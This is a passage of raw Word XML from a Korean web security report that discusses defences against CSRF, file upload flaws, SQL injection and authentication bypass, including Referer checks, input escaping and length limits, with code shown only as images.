          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을 이용하면 위 사진과 같은 결과를 확인 가능</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC03BE" w:rsidRDefault="00AC03BE"/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lastRenderedPageBreak/>
        <w:t xml:space="preserve">일단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 xml:space="preserve">취약점이 있는 경우 스크립트를 통해서 사용자 권한을 악용한 요청을 실행할 수 있기 때문에 </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>취약점이 없는지 확인하는 것도 필요하지만 충분하지는 않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세션 정보와 서비스 요청 </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IP </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>주소 등을 사용해서 웹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클라이언트로부터 전달된 세션 토큰 진위성을 확인하는 방법도 있겠지만 보편적으로 사용하기에는 실효성이 떨어지고,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특수한 환경에서 적용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spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="both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C</w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SRF </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>취약점에 노출되어 있는 서비스의 경우 서비스 요청에 필요한 조건이 없거나 세션 정보만을 이용할 때 공격이 가능하기 때문에 서비스 요청을 할 때 전화,</w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SMS </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>같은 재 인증을 요구하는 방법도 있지만 사용자 입장에서 귀찮은 작업이 많아지고 사소한 작업마다 인증하는 것은 서비스 접근성을 떨어뜨리기 때문에 불편함을 감수할 만큼 민감한 정보를 다루는 금융 관련 서비스 같은 요청에서 적용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회원 정보 수정과 같은 민감한 정보를 수정하는 경우 자신의 비밀번호를 다시 한번 입력하게 해서 본인 여부를 확인하거나 </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">captcha </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>등을 활용해서 정상적인 경로를 통한 요청에서만 확인할 수 있는 랜덤으로 생성되는 확인 문자를 검사한 뒤 정상적인 요청으로 판단되는 경우만 요청을 처리하도록 할 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C7634" w:rsidRP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>G</w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ET </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">방식보다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이 권장되기는 하지만 </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">POST </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">방식도 보고서에서 확인한 것처럼 암호화 통신이 되어 있지 않은 경우 전달하는 </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>parameter</w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">가 </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격에 이용될 수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C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">또한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>헤더에 있는 정보를 통해서도 정상적인 경로인지 확인할 수 있는데,</w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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에 포함되는 정보가 노출되는 것을 방지하기 위해서 브라우저에 따라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>rer</w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">헤더를 제거하고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acket</w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 전송하는 경우도 있어서 보안에 무게를 두고 </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>refe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rer </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">헤더를 통해서 접근을 제한을 할 지 아니면 다수의 브라우저와의 호환성을 위해서 </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">referrer </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>헤더에 제한을 두지 않을지는</w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>주어진 환경에 따라서 결정할 필요가 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C7634" w:rsidRDefault="009C7634" w:rsidP="00CD0B2D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사용자 입장에서는 자신의 권한이 의도하지 않은 요청에 사용되지 않도록 계정을 사용한 뒤에 반드시 로그아웃을 하는 것이 필요</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C7634" w:rsidRDefault="009C7634" w:rsidP="009C7634">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C7634" w:rsidRPr="009C7634" w:rsidRDefault="009C7634" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009C7634">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Referrer </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">제한 </w:t>
      </w:r>
      <w:r>
        <w:t>Secure Coding</w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 예제</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C7634" w:rsidRDefault="009C7634" w:rsidP="009C7634">
      <w:pPr>
        <w:ind w:left="760"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E50A58B" wp14:editId="06EB9CB7">
            <wp:extent cx="3960000" cy="842400"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="253" name="그림 253" descr="실내, 사진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110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34" w:rsidRPr="00901DE7" w:rsidRDefault="009C7634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H</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TTP_REFERER</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">를 통해서 서비스 요청 </w:t>
      </w:r>
      <w:r w:rsidR="00901DE7" w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Packet</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">에 포함된 </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">REFERER </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">헤더 정보를 </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>StringRefer</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">에 저장 후 맨 처음부터 </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>가 나오기 전(</w:t>
      </w:r>
      <w:r w:rsidR="00901DE7" w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>parame</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ter</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">가 붙기 전)까지의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 xml:space="preserve">을 </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">StringRefer </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">변수에 저장한 후 정상적으로 접근했을 때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 xml:space="preserve">이전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과 비교해서 일치하는 지 확인해서 에러 메시지를 출력하거나 정해진 페이지로 이동하도록 할 수 있고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 xml:space="preserve">위와 같은 방식 활용해서 정상적인 </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>refer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er</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">로 판단한 </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의 도메인 제한을 더 넓게 하거나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반대로 </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">parameter </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>전달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중 일정 부분을 포함해서 더 세세한 부분까지 검사해서 </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>refe</w:t>
      </w:r>
      <w:r w:rsidR="00901DE7" w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rer</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>를 통한 요청의 유효성을 검사할 수도 있</w:t>
      </w:r>
      <w:r w:rsidR="00901DE7" w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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071B" w:rsidRDefault="00A6071B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파일 업로드 취약점</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A6071B" w:rsidRDefault="00A6071B" w:rsidP="00A6071B">
      <w:pPr>
        <w:ind w:left="800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5608F7CA" wp14:editId="3116DC52">
            <wp:extent cx="3960000" cy="2322000"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="411" name="그림 411" descr="텍스트, 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55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P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rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>파일이 업로드 되는 과정에서 마지막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자를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 xml:space="preserve">에 저장하는 코드를 삽입하고 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A6071B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6071B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의 값이 업로드를 허용하면 안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되는 확장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 w:rsidRPr="00A6071B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">인지를 판단하는 과정을 통해서 공격에 이용 가능한 파일이 업로드 되는 것을 방지 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>가능</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00901DE7" w:rsidRDefault="00901D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03BE" w:rsidRPr="00A6071B" w:rsidRDefault="00AC03BE" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6071B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6071B">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>QL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC03BE" w:rsidRDefault="00AC03BE" w:rsidP="00AC03BE">
      <w:pPr>
        <w:ind w:left="80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FC4D67E" wp14:editId="4D658154">
            <wp:extent cx="1614115" cy="1047285"/>
            <wp:effectExtent l="0" t="0" r="5715" b="63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09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9" cy="1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6888E" wp14:editId="08F169E2">
            <wp:extent cx="2338878" cy="1042035"/>
            <wp:effectExtent l="0" t="0" r="4445" b="571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-010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69" cy="1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992D5E" wp14:editId="516E2D6A">
            <wp:extent cx="3960000" cy="352800"/>
            <wp:effectExtent l="0" t="0" r="2540" b="952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011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66CDF0" wp14:editId="15F74143">
            <wp:extent cx="3958903" cy="989214"/>
            <wp:effectExtent l="0" t="0" r="3810" b="190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-012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1" cy="9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BB7E03" wp14:editId="72DE213D">
            <wp:extent cx="3953793" cy="798022"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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-013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7" cy="8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6A40D9" wp14:editId="46469E5F">
            <wp:extent cx="3955764" cy="773084"/>
            <wp:effectExtent l="0" t="0" r="6985" b="825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-014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80" cy="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BE" w:rsidRPr="00AC03BE" w:rsidRDefault="00AC03BE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C03BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC03BE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>QL</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC03BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">인젝션을 이용한 인증 우회나 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC03BE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>blind injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC03BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을 시도해도 공격이 막히고 로그가 남는 것을 확인할 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC03BE" w:rsidRDefault="00AC03BE" w:rsidP="00AC03BE">
      <w:pPr>
        <w:ind w:left="80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1BB1C56" wp14:editId="323B0E79">
            <wp:extent cx="3937000" cy="124691"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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23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99" cy="1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1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EED4280" wp14:editId="3F1CEE42">
            <wp:extent cx="3958793" cy="2302626"/>
            <wp:effectExtent l="0" t="0" r="3810" b="254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24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33" cy="23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1B" w:rsidRDefault="00A6071B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A6071B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>XSS, CSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6071B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">와 마찬가지로 암호화되어 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A6071B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Packet </w:t>
      </w:r>
      <w:r w:rsidRPr="00A6071B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>내부 확인 불가능,</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6071B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> UTM</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6071B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 이용하면 위 사진과 같은 결과 확인 가능 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인증 우회 공격 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure Coding </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00901DE7" w:rsidRDefault="00901DE7" w:rsidP="00901DE7">
      <w:pPr>
        <w:ind w:left="760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C17B628" wp14:editId="54B3CDC2">
            <wp:extent cx="3959355" cy="989215"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1905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71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89" cy="9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우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로 전달 받은 </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>userid</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의 값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따로 변수 </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$userid</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>를 만들어서 저장하고,</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> trim</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>으로 앞 뒤 공백을 제거한 후 작은 따옴표가 있으면 그 앞에 역 슬래시를 추가한 상태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작은 따옴표 같이 공격에 이용될 가능성이 있거나 로그인 정책상 사용하지 않도록 되어있는 글자들은 </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>str_replace</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>를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이용해서 미리 치환되거나 에러 처리 되도록 코딩을 할 수 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그렇게 전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처리가 완료된 상태에서 </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>!$userid</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">가 아니라 </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$userid</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">를 빈 문자열과 비교함으로써 </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>userid</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">가 </w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">이 들어갔을 때 아이디에 입력 값이 있는데 아이디를 입력하라는 메시지가 뜨는 경우가 없도록 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>함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그리고 전달받는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의 길이는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 xml:space="preserve"> 도메인 규칙에 맞춰서 특정 길이 내로 제한을 두면 공격에 필요한 충분한 공간이 확보되지 않아 긴 명령어를 이용한 공격을 방지할 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00901DE7" w:rsidRDefault="00901DE7" w:rsidP="00901DE7">
      <w:pPr>
        <w:ind w:left="804"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(전)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="297F5999" wp14:editId="159D074B">
            <wp:extent cx="2119746" cy="125041"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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72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69" cy="1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E7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>후)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B66D087" wp14:editId="125AB8D1">
            <wp:extent cx="2114623" cy="118284"/>
            <wp:effectExtent l="0" t="0" r="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74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62" cy="1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E7" w:rsidRDefault="00901DE7" w:rsidP="00901DE7">
